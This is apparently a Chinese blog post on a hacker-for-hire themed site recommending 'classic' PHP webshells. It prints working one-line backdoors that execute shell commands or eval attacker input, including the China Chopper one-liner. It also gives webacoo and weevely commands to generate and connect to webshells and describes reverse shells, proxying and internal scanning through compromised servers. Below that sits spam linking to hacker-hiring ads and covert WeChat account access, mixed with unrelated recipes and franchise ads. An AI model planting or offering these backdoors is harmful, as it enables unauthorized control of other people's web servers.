几种好用的经典webshell(php)

访客4年前关于黑客接单431

webshell就是以网页文件形式存在的一种下令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问php后门,获得一个下令执行环境,以到达控制网站服务器的目的。 

顾名思义,“web”的寄义是显然需要服务器开放web服务,“shell”的寄义是取得对服务器某种程度上操作权限。webshell经常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态剧本的形式泛起,也有人称之为网站的后门工具。


php经典一句话: 

<?php echo shell_exec($_GET[‘cmd‘]);?>


中国菜刀:
官网:www.maicaidao.co
原理:上传一句话(<?php @eval($_POST[‘我是密码‘]);?>)至服务器端,再用中国菜刀客户端(图形化界面)去毗邻服务器

 

webacoo(kali):
特点:传输的数据包裹在cookie中,并非http包体内,起到一定绕过作用
原理:天生webshell,上传至目的服务器,再拿webacoo去毗邻该webshell,返回可以执行系统下令的shell
瑕玷:不能设置专属毗邻密码
天生webshell: webacoo -g -o a.php
毗邻webshell: webacoo -t -u http://192.168.1.1/a.php

 

weevely(kali):
原理:天生webshell,上传至目的服务器,再拿weevely去毗邻该webshell,返回可以执行系统下令的shell
天生webshell:weevely generate 密码 a.php
毗邻webshell:weevely http://192.168.1.1/a.php 密码
特点:毗邻到目的服务器webshell后还可以挪用内置的N多模块,在shell下输入help查看模块,直接在shell下输入模块名称使用模块

30多个治理模块举例:
1、执行系统下令、浏览文件系统
2、检查服务器常见设置错误
3、建立正向、反向TCP Shell毗邻
4、将目的服务器作为署理http服务器(肉鸡) ====>只需要在毗邻到的shell中输入net_proxy即可打开署理,此时会在内陆监听127.0.0.1:8080,浏览器设置为该署理后所有流量将走目的服务器
5、从目的计算机运行端口扫描,渗透内网


思源资源网:分类流动

1.阿里云: 本站现在使用的是阿里云主机,平安/可靠/稳固。点击领取2000米代金券、领会最新阿里云产物的种种优惠流动点击进入

相关文章

全国最强黑客成名之战(全国十大黑客)

全国最强黑客成名之战(全国十大黑客)

本文目录一览: 1、中国最厉害的黑客是谁 2、历史上最著名的几次黑客事件 3、中国十大黑客排名是什么?有什么事迹? 4、中国黑客前5名分别是谁? 5、什么是中国最牛黑客?? 6、中...

找吉林黑客-好听的黑客代号(好听的黑客代号英文)

找吉林黑客-好听的黑客代号(好听的黑客代号英文)

找吉林黑客相关问题 好听的黑客代号相关问题 怎么用linux进行黑客攻击 黑客自学入侵网站(黑客入侵网站工具)...

怎样上岸他人的微信,又不被发现

  香港警队主题歌来啦   日前,一则“香港警队主题歌来啦”引起关心。据了解,为了更好地谢谢巡警队为港人的开支,因而刻意写作出一首《捍卫香港》向他们致敬。完整篇可能在30日9点半在翡翠台播放视频。  ...

加盟立乐杯奶茶需要投资多少钱?用低成本成功经营路

加盟立乐杯奶茶需要投资多少钱?用低成本成功经营路

在奶茶行业,相信也有很多的人听说过立乐杯奶茶加盟这个品牌,这些年随着品牌知名度的不断提高,越来越多的加盟商都相中了立乐杯奶茶加盟这个品牌醒目,想要在这个品牌中实现自己的人生价值。在这个创业的时代要学会...

在家动手做什么吃的好(夏天可以自己在家动手

在家动手做什么吃的好(夏天可以自己在家动手

今天小编带领大家学做一些外面卖的很贵,但自己学下来确很简单便宜的美食,有什么不懂得地方可以在评论区留言,一起来看看吧~ ★双皮奶 主料:牛奶、鸡蛋(只用蛋清)、白砂糖。 1、240克牛奶分别...

那个论坛有黑客接单,广东找黑客联系方式,捕鱼的黑客去哪找

[1][2][3][4][5][6]黑客接单渠道from:https://www.cyberchallenge.com.au/CySCA2014_Web_Penetration_Testing.pdf...